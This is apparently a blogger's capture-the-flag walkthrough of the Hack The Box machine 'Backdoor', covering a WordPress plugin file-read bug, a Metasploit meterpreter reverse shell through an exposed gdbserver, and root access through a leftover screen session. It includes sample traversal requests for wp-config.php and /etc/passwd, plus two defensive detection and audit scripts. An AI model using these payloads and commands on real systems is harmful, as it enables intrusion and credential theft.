This was a box that I didn’t like that much. It felt a little too CTF’ish to me. Despite that, I learned some cool things.
Nmap revealed 3 ports.
nmap -p- -sC -sV -A --min-rate=400 --min-parallelism=512 -vv backdoor.htb
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIuoNkiwwo7nM8ZE767bKSHJh+RbMsbItjTbVvKK4xKMfZFHzroaLEe9a2/P1D9h2M6khvPI74azqcqnI8SUJAk=
| 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
1337/tcp open waste? syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Looking at the web server on port 80, it was a WordPress site.
So I thought of running wpscan to see if there were any vulnerabilities that we could exploit, but it didn’t find anything. So I had to enumerate it manually, and I saw that the “ebook-download” plugin was installed.
With a quick Google search I found that this plugin was vulnerable to LFI.
Reference: Offensive Security’s Exploit Database Archive, “WordPress Plugin eBook Download 1.1 - Directory Traversal” (webapps exploit for the PHP platform).
As mentioned in the PoC, I tried to include wp-config.php and it worked.
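From the defender’s side, the request that reads wp-config.php through the plugin leaves a clear trace in the Apache access log: a file parameter whose value walks upward with “..”. The following script is an added example, not part of the original write-up: it parses combined-format log lines, percent-decodes each query value (and the path) until stable so that single- and double-encoded traversal is caught, and reports every request carrying a “..” path segment. The sample log lines are constructed, and the plugin endpoint and parameter name (`filedownload.php`, `ebookdownloadurl`) are assumptions for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format. The pattern stops after status and size; the
# referer and user-agent that follow are not needed for this check.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# A ".." segment bounded by slash, backslash, start or end of string.
# "notes..v2.pdf" does not match; "../", "..\\" and a trailing ".." do.
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')


def fully_decode(value, rounds=3):
    """Percent-decode until stable, so double-encoded ..%252f.. normalises to ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_hits(target):
    """Return (where, decoded_value) pairs for the path and each query value
    that contains a '..' segment after decoding."""
    parts = urlsplit(target)
    hits = []
    path = fully_decode(parts.path)
    if TRAVERSAL_RE.search(path):
        hits.append(("<path>", path))
    # parse_qsl already removes one layer of encoding; fully_decode does the rest
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = fully_decode(value)
        if TRAVERSAL_RE.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(lines):
    """One record per request whose path or query carries a traversal sequence.
    status == 200 means the server actually served the file."""
    records = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = traversal_hits(m["target"])
        if hits:
            records.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                            "target": m["target"], "hits": hits})
    return records


# Constructed sample lines (endpoint and parameter name are assumed, see lead-in).
PLUGIN = "/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
SAMPLE_LINES = [
    f'10.10.14.5 - - [12/Nov/2021:10:01:02 +0000] "GET {PLUGIN}../../../wp-config.php HTTP/1.1" 200 3210 "-" "curl/7.74.0"',
    f'10.10.14.5 - - [12/Nov/2021:10:01:09 +0000] "GET {PLUGIN}%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhostname HTTP/1.1" 200 12 "-" "curl/7.74.0"',
    f'10.10.14.5 - - [12/Nov/2021:10:01:15 +0000] "GET {PLUGIN}..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1900 "-" "curl/7.74.0"',
    f'192.168.1.20 - - [12/Nov/2021:10:02:00 +0000] "GET {PLUGIN}books/sample.pdf HTTP/1.1" 200 51200 "-" "Mozilla/5.0"',
    '192.168.1.21 - - [12/Nov/2021:10:03:00 +0000] "GET /index.php?p=12 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '192.168.1.22 - - [12/Nov/2021:10:04:00 +0000] "GET /files/notes..v2.pdf HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for r in scan_log(SAMPLE_LINES):
        served = "SERVED" if r["status"] == 200 else "not served"
        print(f'{r["ts"]} {r["ip"]} {served} {r["hits"]}')
```

Run it against the real log with `scan_log(open("/var/log/apache2/access.log"))`; a 200 on a hit is the line to act on, since it means the traversal reached a file the plugin should never have served. Treating a “..” segment as suspicious regardless of which parameter carries it keeps the check useful for any plugin, not just this one.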
With this I tried to include files that I thought were important, but I couldn’t find anything interesting. Then I remembered that port 1337 was open. I didn’t know what service was running on it, so I thought of finding out which process was listening there and what that service was.
For this I wrote a small Python script that enumerates running process IDs and reads the command line of each process.
python3 proc-fuzz.py > proc
With this I was able to identify that gdbserver was running on port 1337.
And I was able to find a Metasploit module to exploit this.
Reference: “GDB Server Remote Payload Execution - Metasploit” (InfosecMatter). This page contains detailed information about how to use the exploit/multi/gdb/gdb_server_exec Metasploit module.
Following this article, I was able to exploit this and get a meterpreter instance.
sudo msfdb run
set payload linux/x64/meterpreter/reverse_tcp
set RHOST 10.10.11.125
set RPORT 1337
set LHOST tun0
set LPORT 1234
Running linpeas as the “user” user, I saw that screen, a terminal multiplexer (virtual screen manager), was running.
linpeas stated that there was a screen session running as root, named “root”, and that the screen binary was SUID as well.
So I was able to attach to that screen session and get into a root shell.
screen -x root/root
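Both footholds on this box come down to host configuration that an admin can check for: a debug service (gdbserver) listening on a network-reachable port, and a setuid screen binary with a root session left behind that other accounts can attach to. The script below is an added example, not code from the write-up: it parses `/proc/net/tcp` for LISTEN sockets on non-loopback addresses outside an allow-list, tests the setuid bit on the screen binary, and lists screen session sockets under `/run/screen/S-<owner>/` (the socket directory layout and the `/usr/bin/screen` path are assumptions; adjust for the distribution). The embedded `/proc/net/tcp` text and socket paths are constructed so the checks run offline; `main()` runs the same checks against the live host and should be run as root, since the session directories are normally mode 700.

```python
import glob
import os
import socket
import stat
import struct

LISTEN = "0A"  # socket state code for LISTEN in /proc/net/tcp


def parse_proc_net_tcp(text):
    """Parse /proc/net/tcp text into (local_ip, local_port, state, uid) tuples."""
    rows = []
    for line in text.splitlines()[1:]:          # first line is the column header
        fields = line.split()
        if len(fields) < 8:
            continue
        ip_hex, port_hex = fields[1].split(":")
        # the kernel prints the IPv4 address as little-endian hex on x86, hence "<I"
        ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
        rows.append((ip, int(port_hex, 16), fields[3], int(fields[7])))
    return rows


def unexpected_listeners(rows, allowed_ports):
    """LISTEN sockets on a non-loopback address whose port is not in the allow-list."""
    return [(ip, port, uid) for ip, port, state, uid in rows
            if state == LISTEN and not ip.startswith("127.") and port not in allowed_ports]


def is_setuid(mode):
    """True if the setuid bit is set in an st_mode value."""
    return bool(mode & stat.S_ISUID)


def parse_screen_sockets(paths):
    """Turn /run/screen/S-<owner>/<pid>.<name> paths into (owner, pid, name)."""
    sessions = []
    for p in paths:
        owner_dir = os.path.basename(os.path.dirname(p))
        pid_str, _, name = os.path.basename(p).partition(".")
        if owner_dir.startswith("S-") and pid_str.isdigit():
            sessions.append((owner_dir[2:], int(pid_str), name))
    return sessions


def audit(tcp_text, screen_mode, screen_socket_paths, allowed_ports=frozenset({22, 80})):
    """Findings for the conditions this box exposed; empty list means clean."""
    findings = []
    for ip, port, uid in unexpected_listeners(parse_proc_net_tcp(tcp_text), allowed_ports):
        findings.append(f"listener {ip}:{port} (uid {uid}) is outside the allow-list; "
                        "a debug service such as gdbserver here is unauthenticated code execution")
    suid = is_setuid(screen_mode)
    if suid:
        findings.append("screen binary is setuid; multiuser sessions can be attached by other accounts")
    for owner, pid, name in parse_screen_sockets(screen_socket_paths):
        if owner == "root":
            findings.append(f"root screen session {pid}.{name} exists"
                            + (" and screen is setuid: review its multiuser/acl settings" if suid else ""))
    return findings


# Constructed sample data: ssh and http on all interfaces, mysql on loopback,
# port 1337 on all interfaces owned by uid 1000, plus one established ssh connection.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 20001 1 0000000000000000 100 0 0 10 0
   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 20002 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   112        0 20003 1 0000000000000000 100 0 0 10 0
   3: 00000000:0539 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 20004 1 0000000000000000 100 0 0 10 0
   4: 00000000:0016 0A0A0E05:C2F4 01 00000000:00000000 00:00000000 00000000     0        0 20005 1 0000000000000000 100 0 0 10 0
"""
SAMPLE_SCREEN_SOCKETS = ["/run/screen/S-root/1412.root", "/run/screen/S-user/2201.work"]
SAMPLE_SCREEN_MODE = 0o104755  # -rwsr-xr-x, i.e. setuid root


def main():
    """Run the checks against the live host (Linux only, run as root)."""
    try:
        with open("/proc/net/tcp") as fh:
            tcp_text = fh.read()
    except OSError:
        tcp_text = ""
    try:
        mode = os.stat("/usr/bin/screen").st_mode   # assumed binary location
    except OSError:
        mode = 0
    sockets = glob.glob("/run/screen/S-*/*") + glob.glob("/var/run/screen/S-*/*")
    for finding in audit(tcp_text, mode, sockets) or ["no findings"]:
        print(finding)


if __name__ == "__main__":
    main()
```

On the sample data the audit reports three findings: the 1337 listener, the setuid screen binary, and the root session. The fix for each is the corresponding configuration change rather than detection alone: bind debuggers to loopback or not at all, drop the setuid bit on screen unless multiuser sessions are genuinely needed, and do not leave root sessions detached with multiuser access enabled.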
“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”
Email — email@example.com
Instagram — https://www.instagram.com/_kavi.gihan/
Happy Hacking !!! 😄